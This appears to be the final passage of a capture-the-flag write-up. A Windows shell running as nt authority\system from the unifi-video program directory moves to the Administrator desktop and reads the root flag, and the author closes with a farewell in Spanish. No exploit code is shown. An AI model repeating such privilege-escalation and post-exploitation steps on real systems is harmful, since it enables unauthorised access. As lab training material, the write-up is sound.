Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\ProgramData\unifi-video>whoami
whoami
nt authority\system

C:\ProgramData\unifi-video>cd c:\Users\Administrator\Desktop
cd c:\Users\Administrator\Desktop

root.txt

c:\Users\Administrator\Desktop>type root.txt

… We got root flag.


Gracias por llegar hasta aquí, hasta la próxima!